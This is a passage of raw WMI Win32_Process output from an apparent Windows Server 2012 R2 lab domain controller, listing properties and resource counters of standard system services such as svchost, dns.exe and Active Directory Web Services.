C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"976\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"976\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k NetworkService\nCreationClassName : Win32_Process\nCreationDate : 20170712121429.232454-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 976\nHandleCount : 765\nInstallDate :\nKernelModeTime : 27968750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 114190\nOtherTransferCount : 7318686\nPageFaults : 69903\nPageFileUsage : 10460\nParentProcessId : 440\nPeakPageFileUsage : 28680\nPeakVirtualSize : 1432371200\nPeakWorkingSetSize : 37824\nPriority : 8\nPrivatePageCount : 10711040\nProcessId : 976\nQuotaNonPagedPoolUsage : 59\nQuotaPagedPoolUsage : 198\nQuotaPeakNonPagedPoolUsage : 635\nQuotaPeakPagedPoolUsage : 681\nReadOperationCount : 2943\nReadTransferCount : 24663723\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 18\nUserModeTime : 21406250\nVirtualSize : 1192726528\nWindowsVersion : 6.3.9600\nWorkingSetSize : 13594624\nWriteOperationCount : 47787\nWriteTransferCount : 240797843\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 765\nVM : 1192726528\nWS : 13594624\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"432\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"432\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k LocalServiceNoNetwork\nCreationClassName : Win32_Process\nCreationDate : 20170712121429.404423-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 432\nHandleCount : 367\nInstallDate :\nKernelModeTime : 468750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 4261\nOtherTransferCount : 204542\nPageFaults : 9080\nPageFileUsage : 6392\nParentProcessId : 440\nPeakPageFileUsage : 6732\nPeakVirtualSize : 53354496\nPeakWorkingSetSize : 10496\nPriority : 8\nPrivatePageCount : 6545408\nProcessId : 432\nQuotaNonPagedPoolUsage : 33\nQuotaPagedPoolUsage : 87\nQuotaPeakNonPagedPoolUsage : 36\nQuotaPeakPagedPoolUsage : 89\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 17\nUserModeTime : 1718750\nVirtualSize : 51679232\nWindowsVersion : 6.3.9600\nWorkingSetSize : 5402624\nWriteOperationCount : 1\nWriteTransferCount : 32768\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 367\nVM : 51679232\nWS : 5402624\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1416\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1416\"\nCaption : spoolsv.exe\nCommandLine : C:\\Windows\\System32\\spoolsv.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121450.375156-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : spoolsv.exe\nExecutablePath : C:\\Windows\\System32\\spoolsv.exe\nExecutionState :\nHandle : 1416\nHandleCount : 371\nInstallDate :\nKernelModeTime : 468750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : spoolsv.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 862\nOtherTransferCount : 34088\nPageFaults : 3144\nPageFileUsage : 3036\nParentProcessId : 440\nPeakPageFileUsage : 3424\nPeakVirtualSize : 74260480\nPeakWorkingSetSize : 8664\nPriority : 8\nPrivatePageCount : 3108864\nProcessId : 1416\nQuotaNonPagedPoolUsage : 20\nQuotaPagedPoolUsage : 153\nQuotaPeakNonPagedPoolUsage : 24\nQuotaPeakPagedPoolUsage : 158\nReadOperationCount : 3\nReadTransferCount : 1464\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 9\nUserModeTime : 468750\nVirtualSize : 72437760\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2703360\nWriteOperationCount : 2\nWriteTransferCount : 320\nPSComputerName : WIN-2012-DC\nProcessName : spoolsv.exe\nHandles : 371\nVM : 72437760\nWS : 2703360\nPath : C:\\Windows\\System32\\spoolsv.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1368\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1368\"\nCaption : Microsoft.ActiveDirectory.WebServices.exe\nCommandLine : C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121450.413055-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : Microsoft.ActiveDirectory.WebServices.exe\nExecutablePath : C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\nExecutionState :\nHandle : 1368\nHandleCount : 1137\nInstallDate :\nKernelModeTime : 1718750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : Microsoft.ActiveDirectory.WebServices.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 19837\nOtherTransferCount : 664902\nPageFaults : 36144\nPageFileUsage : 30624\nParentProcessId : 440\nPeakPageFileUsage : 33404\nPeakVirtualSize : 595652608\nPeakWorkingSetSize : 40372\nPriority : 8\nPrivatePageCount : 31358976\nProcessId : 1368\nQuotaNonPagedPoolUsage : 38\nQuotaPagedPoolUsage : 350\nQuotaPeakNonPagedPoolUsage : 45\nQuotaPeakPagedPoolUsage : 351\nReadOperationCount : 145\nReadTransferCount : 429485\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 9\nUserModeTime : 4218750\nVirtualSize : 591695872\nWindowsVersion : 6.3.9600\nWorkingSetSize : 8187904\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : Microsoft.ActiveDirectory.WebServices.exe\nHandles : 1137\nVM : 591695872\nWS : 8187904\nPath : C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1408\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1408\"\nCaption : dfsrs.exe\nCommandLine : C:\\Windows\\system32\\DFSRs.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121450.696161-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : dfsrs.exe\nExecutablePath : C:\\Windows\\system32\\DFSRs.exe\nExecutionState :\nHandle : 1408\nHandleCount : 326\nInstallDate :\nKernelModeTime : 82187500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : dfsrs.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1135772\nOtherTransferCount : 205072548\nPageFaults : 24017\nPageFileUsage : 14000\nParentProcessId : 440\nPeakPageFileUsage : 16580\nPeakVirtualSize : 634163200\nPeakWorkingSetSize : 20244\nPriority : 8\nPrivatePageCount : 14336000\nProcessId : 1408\nQuotaNonPagedPoolUsage : 31\nQuotaPagedPoolUsage : 125\nQuotaPeakNonPagedPoolUsage : 35\nQuotaPeakPagedPoolUsage : 125\nReadOperationCount : 2257\nReadTransferCount : 11713324\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 16\nUserModeTime : 167031250\nVirtualSize : 632573952\nWindowsVersion : 6.3.9600\nWorkingSetSize : 8740864\nWriteOperationCount : 7233\nWriteTransferCount : 96925643\nPSComputerName : WIN-2012-DC\nProcessName : dfsrs.exe\nHandles : 326\nVM : 632573952\nWS : 8740864\nPath : C:\\Windows\\system32\\DFSRs.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1508\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1508\"\nCaption : dns.exe\nCommandLine : C:\\Windows\\system32\\dns.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121450.752362-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : dns.exe\nExecutablePath : C:\\Windows\\system32\\dns.exe\nExecutionState :\nHandle : 1508\nHandleCount : 10288\nInstallDate :\nKernelModeTime : 5625000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : dns.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 57082\nOtherTransferCount : 1418712\nPageFaults : 30531\nPageFileUsage : 89072\nParentProcessId : 440\nPeakPageFileUsage : 89472\nPeakVirtualSize : 147890176\nPeakWorkingSetSize : 87164\nPriority : 8\nPrivatePageCount : 91209728\nProcessId : 1508\nQuotaNonPagedPoolUsage : 10059\nQuotaPagedPoolUsage : 1262\nQuotaPeakNonPagedPoolUsage : 10295\nQuotaPeakPagedPoolUsage : 1264\nReadOperationCount : 75\nReadTransferCount : 8700\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 14\nUserModeTime : 2812500\nVirtualSize : 146837504\nWindowsVersion : 6.3.9600\nWorkingSetSize : 9383936\nWriteOperationCount : 78\nWriteTransferCount : 12000\nPSComputerName : WIN-2012-DC\nProcessName : dns.exe\nHandles : 10288\nVM : 146837504\nWS : 9383936\nPath : C:\\Windows\\system32\\dns.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1548\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1548\"\nCaption : ismserv.exe\nCommandLine : C:\\Windows\\System32\\ismserv.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121450.809793-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : ismserv.exe\nExecutablePath : C:\\Windows\\System32\\ismserv.exe\nExecutionState :\nHandle : 1548\nHandleCount : 88\nInstallDate :\nKernelModeTime : 156250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : ismserv.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 377\nOtherTransferCount : 6646\nPageFaults : 1448\nPageFileUsage : 1380\nParentProcessId : 440\nPeakPageFileUsage : 1640\nPeakVirtualSize : 29483008\nPeakWorkingSetSize : 4108\nPriority : 8\nPrivatePageCount : 1413120\nProcessId : 1548\nQuotaNonPagedPoolUsage : 11\nQuotaPagedPoolUsage : 39\nQuotaPeakNonPagedPoolUsage : 12\nQuotaPeakPagedPoolUsage : 39\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 6\nUserModeTime : 0\nVirtualSize : 26324992\nWindowsVersion : 6.3.9600\nWorkingSetSize : 839680\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : ismserv.exe\nHandles : 88\nVM : 26324992\nWS : 839680\nPath : C:\\Windows\\System32\\ismserv.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1700\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1700\"\nCaption : wlms.exe\nCommandLine : C:\\Windows\\system32\\wlms\\wlms.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121451.074083-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : wlms.exe\nExecutablePath : C:\\Windows\\system32\\wlms\\wlms.exe\nExecutionState :\nHandle : 1700\nHandleCount : 39\nInstallDate :\nKernelModeTime : 0\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : wlms.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 51\nOtherTransferCount : 194\nPageFaults : 1090\nPageFileUsage : 484\nParentProcessId : 440\nPeakPageFileUsage : 576\nPeakVirtualSize : 15691776\nPeakWorkingSetSize : 2620\nPriority : 8\nPrivatePageCount : 495616\nProcessId : 1700\nQuotaNonPagedPoolUsage : 4\nQuotaPagedPoolUsage : 29\nQuotaPeakNonPagedPoolUsage : 5\nQuotaPeakPagedPoolUsage : 29\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 2\nUserModeTime : 0\nVirtualSize : 14626816\nWindowsVersion : 6.3.9600\nWorkingSetSize : 1306624\nWriteOperationCount : 48\nWriteTransferCount : 1228\nPSComputerName : WIN-2012-DC\nProcessName : wlms.exe\nHandles : 39\nVM : 14626816\nWS : 1306624\nPath : C:\\Windows\\system32\\wlms\\wlms.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1708\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1708\"\nCaption : dfssvc.exe\nCommandLine : C:\\Windows\\system32\\dfssvc.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121451.112485-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : dfssvc.exe\nExecutablePath : C:\\Windows\\system32\\dfssvc.exe\nExecutionState :\nHandle : 1708\nHandleCount : 131\nInstallDate :\nKernelModeTime : 156250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : dfssvc.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 437\nOtherTransferCount : 10480\nPageFaults : 2137\nPageFileUsage : 1912\nParentProcessId : 440\nPeakPageFileUsage : 2068\nPeakVirtualSize : 32190464\nPeakWorkingSetSize : 5000\nPriority : 8\nPrivatePageCount : 1957888\nProcessId : 1708\nQuotaNonPagedPoolUsage : 13\nQuotaPagedPoolUsage : 48\nQuotaPeakNonPagedPoolUsage : 15\nQuotaPeakPagedPoolUsage : 48\nReadOperationCount : 15\nReadTransferCount : 3374\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 11\nUserModeTime : 0\nVirtualSize : 30593024\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2887680\nWriteOperationCount : 14\nWriteTransferCount : 6034\nPSComputerName : WIN-2012-DC\nProcessName : dfssvc.exe\nHandles : 131\nVM : 30593024\nWS : 2887680\nPath : C:\\Windows\\system32\\dfssvc.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1316\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1316\"\nCaption : vds.exe\nCommandLine : C:\\Windows\\System32\\vds.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121512.030634-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : vds.exe\nExecutablePath : C:\\Windows\\System32\\vds.exe\nExecutionState :\nHandle : 1316\nHandleCount : 158\nInstallDate :\nKernelModeTime : 625000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : vds.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 841\nOtherTransferCount : 28175\nPageFaults : 2931\nPageFileUsage : 1772\nParentProcessId : 440\nPeakPageFileUsage : 2152\nPeakVirtualSize : 48394240\nPeakWorkingSetSize : 7856\nPriority : 8\nPrivatePageCount : 1814528\nProcessId : 1316\nQuotaNonPagedPoolUsage : 16\nQuotaPagedPoolUsage : 88\nQuotaPeakNonPagedPoolUsage : 19\nQuotaPeakPagedPoolUsage : 92\nReadOperationCount : 32\nReadTransferCount : 94208\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 11\nUserModeTime : 156250\nVirtualSize : 45608960\nWindowsVersion : 6.3.9600\nWorkingSetSize : 1138688\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : vds.exe\nHandles : 158\nVM : 45608960\nWS : 1138688\nPath : C:\\Windows\\System32\\vds.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1248\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1248\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\System32\\svchost.exe -k termsvcs\nCreationClassName : Win32_Process\nCreationDate : 20170712121512.705767-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\System32\\svchost.exe\nExecutionState :\nHandle : 1248\nHandleCount : 401\nInstallDate :\nKernelModeTime : 937500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 262\nOtherTransferCount : 840\nPageFaults : 4263\nPageFileUsage : 3432\nParentProcessId : 440\nPeakPageFileUsage : 3548\nPeakVirtualSize : 76869632\nPeakWorkingSetSize : 7380\nPriority : 8\nPrivatePageCount : 3514368\nProcessId : 1248\nQuotaNonPagedPoolUsage : 19\nQuotaPagedPoolUsage : 151\nQuotaPeakNonPagedPoolUsage : 19\nQuotaPeakPagedPoolUsage : 154\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 22\nUserModeTime : 781250\nVirtualSize : 75804672\nWindowsVersion : 6.3.9600\nWorkingSetSize : 2772992\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 401\nVM : 75804672\nWS : 2772992\nPath : C:\\Windows\\System32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"1336\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"1336\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k NetworkServiceNetworkRestricted\nCreationClassName : Win32_Process\nCreationDate : 20170712121512.750613-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 1336\nHandleCount : 107\nInstallDate :\nKernelModeTime : 1406250\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 2288\nOtherTransferCount : 122758\nPageFaults : 2380\nPageFileUsage : 1052\nParentProcessId : 440\nPeakPageFileUsage : 1204\nPeakVirtualSize : 22446080\nPeakWorkingSetSize : 4368\nPriority : 8\nPrivatePageCount : 1077248\nProcessId : 1336\nQuotaNonPagedPoolUsage : 11\nQuotaPagedPoolUsage : 46\nQuotaPeakNonPagedPoolUsage : 13\nQuotaPeakPagedPoolUsage : 46\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 3\nUserModeTime : 312500\nVirtualSize : 21381120\nWindowsVersion : 6.3.9600\nWorkingSetSize : 1826816\nWriteOperationCount : 0\nWriteTransferCount : 0\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 107\nVM : 21381120\nWS : 1826816\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2060\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"2060\"\nCaption : svchost.exe\nCommandLine : C:\\Windows\\system32\\svchost.exe -k LocalSystemNetworkRestricted\nCreationClassName : Win32_Process\nCreationDate : 20170712121512.780955-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : svchost.exe\nExecutablePath : C:\\Windows\\system32\\svchost.exe\nExecutionState :\nHandle : 2060\nHandleCount : 261\nInstallDate :\nKernelModeTime : 625000\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : svchost.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 1670\nOtherTransferCount : 37440\nPageFaults : 6773\nPageFileUsage : 7724\nParentProcessId : 440\nPeakPageFileUsage : 11332\nPeakVirtualSize : 1166675968\nPeakWorkingSetSize : 12516\nPriority : 8\nPrivatePageCount : 7909376\nProcessId : 2060\nQuotaNonPagedPoolUsage : 18\nQuotaPagedPoolUsage : 126\nQuotaPeakNonPagedPoolUsage : 19\nQuotaPeakPagedPoolUsage : 127\nReadOperationCount : 389\nReadTransferCount : 12832768\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 8\nUserModeTime : 0\nVirtualSize : 628494336\nWindowsVersion : 6.3.9600\nWorkingSetSize : 3465216\nWriteOperationCount : 360\nWriteTransferCount : 2072576\nPSComputerName : WIN-2012-DC\nProcessName : svchost.exe\nHandles : 261\nVM : 628494336\nWS : 3465216\nPath : C:\\Windows\\system32\\svchost.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2600\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"2600\"\nCaption : msdtc.exe\nCommandLine : C:\\Windows\\System32\\msdtc.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712121711.180176-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : msdtc.exe\nExecutablePath : C:\\Windows\\System32\\msdtc.exe\nExecutionState :\nHandle : 2600\nHandleCount : 158\nInstallDate :\nKernelModeTime : 0\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : msdtc.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 158\nOtherTransferCount : 274\nPageFaults : 2084\nPageFileUsage : 2312\nParentProcessId : 440\nPeakPageFileUsage : 2480\nPeakVirtualSize : 42795008\nPeakWorkingSetSize : 6812\nPriority : 8\nPrivatePageCount : 2367488\nProcessId : 2600\nQuotaNonPagedPoolUsage : 12\nQuotaPagedPoolUsage : 74\nQuotaPeakNonPagedPoolUsage : 13\nQuotaPeakPagedPoolUsage : 74\nReadOperationCount : 0\nReadTransferCount : 0\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 9\nUserModeTime : 0\nVirtualSize : 41689088\nWindowsVersion : 6.3.9600\nWorkingSetSize : 413696\nWriteOperationCount : 3\nWriteTransferCount : 1286144\nPSComputerName : WIN-2012-DC\nProcessName : msdtc.exe\nHandles : 158\nVM : 41689088\nWS : 413696\nPath : C:\\Windows\\System32\\msdtc.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"260\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : WIN-2012-DC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\WIN-2012-DC\\root\\cimv2:Win32_Process.Handle=\"260\"\nCaption : taskhostex.exe\nCommandLine : taskhostex.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712145926.030215-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : taskhostex.exe\nExecutablePath : C:\\Windows\\system32\\taskhostex.exe\nExecutionState :\nHandle : 260\nHandleCount : 195\nInstallDate :\nKernelModeTime : 468750\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : taskhostex.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 787\nOtherTransferCount : 10860\nPageFaults : 2543\nPageFileUsage : 2676\nParentProcessId : 